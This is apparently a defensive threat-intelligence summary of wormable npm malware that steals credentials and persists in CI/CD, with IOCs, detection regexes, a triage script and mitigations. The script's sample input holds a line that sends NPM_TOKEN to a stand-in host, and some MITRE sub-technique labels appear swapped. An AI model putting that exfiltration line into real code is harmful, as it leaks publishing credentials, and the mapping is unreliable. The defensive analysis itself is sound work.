Full Report
Unit 42 analyzes npm supply chain evolution post-Shai Hulud: wormable malware, CI/CD persistence, multi-stage attacks and more. Source: "The npm Threat Landscape: Attack Surface and Mitigations", Unit 42.
Analysis Summary
This summary of the Unit 42 research on the evolving npm supply chain threat landscape focuses on the primary toolsets and techniques identified.
# Tool/Technique: Wormable npm Malware (Shai Hulud Evolution)
## Overview
This represents a sophisticated class of npm-based malware designed for automated propagation across the software supply chain. Unlike traditional "one-off" malicious packages, these scripts automatically modify other packages or inject malicious code into CI/CD pipelines to ensure self-propagation and persistence.
## Technical Details
- **Type:** Malware Family / Supply Chain Worm
- **Platform:** Cross-platform (Node.js environments, Linux/Windows/macOS CI runners)
- **Capabilities:** Self-replication, automated package publication, credential theft, and GitHub Action modification.
- **First Seen:** Evolution noted significantly post-2023 (following the original Shai Hulud discovery).
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
  - [T1195.002 - Supply Chain Compromise: Compromise Software Dependencies]
- **[TA0003 - Persistence]**
  - [T1195.001 - Supply Chain Compromise: Compromise Software Supply Chain]
  - [T1546 - Event Triggered Execution]
- **[TA0006 - Credential Access]**
  - [T1552.001 - Unsecured Credentials: Credentials In Files]
- **[TA0011 - Command and Control]**
  - [T1071.001 - Application Layer Protocol: Web Protocols]
## Functionality
### Core Capabilities
- **Dependency Hijacking:** Automatically identifies and overwrites local `package.json` or `node_modules` files to include malicious dependencies.
- **Automated Publication:** Uses captured npm auth tokens to publish new versions of legitimate packages or brand-new malicious packages under a compromised user’s scope.
- **Credential Exfiltration:** Scans environment variables and `~/.npmrc` files for authentication tokens and sends them to a C2 server.
### Advanced Features
- **CI/CD Persistence:** Specifically targets GitHub Actions and GitLab CI/CD files (e.g., `.github/workflows/*.yml`) to inject malicious steps that execute every time a build is triggered.
- **Wormable Propagation:** Incorporates logic to automatically search for other repositories on a compromised machine and attempt to "infect" them by pushing malicious commits if Git credentials are found.
## Indicators of Compromise
- **File Names:** `index.js`, `preinstall.js`, `setup.js` (often obfuscated or minified).
- **Network Indicators:**
  - `hxxps://api[.]shai-hulud[.]io` (historical)
  - `hxxps://burpcollaborator[.]net` (frequent for exfiltration)
  - `hxxps://pipedream[.]net` (frequent for exfiltration)
- **Behavioral Indicators:**
  - `npm publish` executed from a CI/CD runner unexpectedly.
  - Unusual outbound `POST` requests containing base64 strings during `npm install`.
  - Modification of `.github/workflows/` files without a corresponding Pull Request description.
## Associated Threat Actors
- **Shai Hulud Actors:** Early innovators of npm-based wormable scripts.
- **Financially Motivated Actors:** Using these techniques for crypto-jacking or selling access to corporate build environments.
## Detection Methods
- **Signature-based detection:** Scanning `package.json` for known malicious script patterns (e.g., long obfuscated hex strings in `preinstall` scripts).
- **Behavioral detection:**
  - Monitoring for processes where `node` or `npm` initiates a connection to known exfiltration endpoints.
  - Tracking file system changes to sensitive CI/CD configuration files.
- **YARA rules:** Looking for patterns such as `process.env.NPM_TOKEN` combined with `fetch()` or `axios()` calls to external IPs.
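
The signature checks listed above can be prototyped as a static triage pass over a package before it is installed. The following is an added example, not code from the Unit 42 report: the function names, rule names, length thresholds and the `collector.example` host are assumptions chosen for illustration, and the sample inputs are constructed.

```javascript
// Added example: static triage of an npm package for the patterns named above.
// Thresholds and rule names are assumptions, not taken from the Unit 42 report.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
const LONG_HEX = /(?:\\x[0-9a-f]{2}){16,}|\b[0-9a-f]{64,}\b/i;
const LONG_B64 = /[A-Za-z0-9+/]{120,}={0,2}/;
const TOKEN_READ = /process\.env(?:\.NPM_TOKEN|\[\s*['"]NPM_TOKEN['"]\s*\])|\.npmrc/;
const NET_CALL = /\b(?:fetch|axios(?:\.\w+)?|https?\.request)\s*\(/;

// Flag install-time lifecycle scripts, which run automatically on `npm install`.
function auditManifest(manifestText) {
  const findings = [];
  let manifest;
  try {
    manifest = JSON.parse(manifestText);
  } catch (err) {
    return [{ rule: "unparseable-manifest", detail: err.message }];
  }
  const scripts = (manifest && manifest.scripts) || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    findings.push({ rule: "install-hook", detail: `${hook}: ${cmd.slice(0, 80)}` });
    if (LONG_HEX.test(cmd) || LONG_B64.test(cmd)) {
      findings.push({ rule: "obfuscated-hook", detail: hook });
    }
  }
  return findings;
}

// Flag source that both reads npm credentials and makes an outbound call.
function auditSource(fileName, source) {
  const findings = [];
  if (TOKEN_READ.test(source) && NET_CALL.test(source)) {
    findings.push({ rule: "token-read-plus-network", detail: fileName });
  }
  if (LONG_HEX.test(source) || LONG_B64.test(source)) {
    findings.push({ rule: "encoded-blob", detail: fileName });
  }
  return findings;
}

// Constructed samples (not real malware, no real endpoint).
const sampleManifest = JSON.stringify({
  name: "example-pkg", version: "1.0.0",
  scripts: { test: "jest", preinstall: "node -e \"" + "\\x61".repeat(20) + "\"" },
});
const sampleSource =
  "const t = process.env.NPM_TOKEN;\nfetch('https://collector.example/', { method: 'POST', body: t });";
console.log(auditManifest(sampleManifest), auditSource("setup.js", sampleSource));
```

A hit on `install-hook` alone is common in legitimate packages with native builds; the combination rules are the ones worth routing to manual review.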
## Mitigation Strategies
- **Prevention measures:**
  - Use `npm install --ignore-scripts` to prevent execution of malicious code during download.
  - Use lockfiles (`package-lock.json`) and verify integrity hashes.
- **Hardening recommendations:**
  - Implement **Socket.dev** or **Graphite** to analyze package behavior before installation.
  - Use CI/CD secrets with the minimum required scope (avoid "Organization" level secrets where possible).
  - Enable Multi-Factor Authentication (MFA) for npm publishing.
## Related Tools/Techniques
- **Typosquatting:** Registering names similar to popular packages (e.g., `react-dom` vs `react-domin`).
- **Dependency Confusion:** Uploading a higher-versioned malicious package to a public registry with the same name as an internal private package.
- **Starjacking:** Faking repository popularity by linking a malicious package to the GitHub URL of a legitimate project.